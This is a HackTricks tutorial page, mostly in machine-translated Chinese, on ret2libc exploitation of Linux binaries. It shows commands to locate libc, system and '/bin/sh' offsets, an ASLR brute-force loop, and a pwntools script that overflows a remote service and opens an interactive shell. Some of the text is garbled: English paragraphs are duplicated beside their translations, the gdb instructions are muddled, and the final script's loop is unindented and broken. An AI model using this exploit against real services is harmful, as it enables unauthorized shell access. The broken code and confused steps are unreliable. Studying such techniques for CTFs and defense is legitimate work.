hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>


**如果你找到了一个有漏洞的二进制文件，并且认为可以使用Ret2Lib来利用它，这里有一些基本步骤供你参考。**

# 如果你在**主机内部**

## 你可以找到**libc的地址**
```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
```
如果你想检查ASLR是否改变了libc的地址，可以执行以下操作：
```bash
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
```
## 获取system函数的偏移量

To exploit a binary using a ret2libc attack, we need to find the offset of the `system` function in the target binary. This offset will help us calculate the address of the `system` function in memory.

为了利用ret2libc攻击来利用一个二进制文件，我们需要找到目标二进制文件中`system`函数的偏移量。这个偏移量将帮助我们计算内存中`system`函数的地址。

To find the offset, we can use a tool like `objdump` or `readelf` to analyze the target binary. We need to search for the symbol table entry of the `system` function and note down its offset.

为了找到偏移量，我们可以使用`objdump`或`readelf`等工具来分析目标二进制文件。我们需要搜索`system`函数的符号表项，并记录下它的偏移量。

For example, using `objdump`, we can run the following command:

例如，使用`objdump`，我们可以运行以下命令：

```bash
objdump -T <binary> | grep system
```

This command will display the symbol table entries containing the word "system". We need to look for the entry that corresponds to the `system` function and note down its offset.

这个命令将显示包含单词"system"的符号表项。我们需要找到对应于`system`函数的条目，并记录下它的偏移量。

Once we have the offset, we can calculate the address of the `system` function by adding the offset to the base address of the loaded binary in memory.

一旦我们有了偏移量，我们可以通过将偏移量加上内存中加载的二进制文件的基地址来计算`system`函数的地址。

Note: The offset may vary depending on the version of the target binary and the system it is running on. So, it is important to find the offset specific to the target binary and system.

注意：偏移量可能会因目标二进制文件的版本和运行系统而有所不同。因此，找到特定于目标二进制文件和系统的偏移量非常重要。
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
## 获取 "/bin/sh" 的偏移量

To exploit a binary using a ret2lib technique, we need to find the offset of the string "/bin/sh" in the binary's memory. This string is commonly used as an argument for functions like `system()` or `execve()` to execute commands in a shell.

To find the offset, we can use a tool like `gdb` to debug the binary. Here are the steps to follow:

1. Open the binary in `gdb` by running the command `gdb <binary_name>`.
2. Set a breakpoint at a function that uses the string "/bin/sh". For example, you can set a breakpoint at the `system()` function by running the command `break system`.
3. Start the execution of the binary by running the command `run`.
4. Once the breakpoint is hit, use the command `x/s <address>` to examine the memory at a specific address. Replace `<address>` with the address where the string "/bin/sh" is stored. For example, if the address is `0x804a030`, you can run the command `x/s 0x804a030`.
5. The output of the command will display the string "/bin/sh" along with its memory address. Note down the memory address.

By following these steps, you can determine the offset of the string "/bin/sh" in the binary's memory. This offset will be useful when crafting the payload for the ret2lib exploit.
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
## /proc/\<PID>/maps

如果进程每次与其交互时都会创建子进程（网络服务器），尝试读取该文件（可能需要以root身份）。

在这里，您可以找到libc在进程中的加载位置以及每个子进程将要加载的位置。

![](<../../.gitbook/assets/image (95).png>)

在这种情况下，它加载在**0xb75dc000**（这将是libc的基地址）

## 使用gdb-peda

使用gdb-peda获取**system**函数、**exit**函数和字符串**"/bin/sh"**的地址：
```
p system
p exit
find "/bin/sh"
```
# 绕过ASLR

你可以尝试暴力破解libc的基址。
```python
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
# 代码
```python
from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？想要在HackTricks中看到你的**公司广告**吗？或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或者 [**Telegram群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>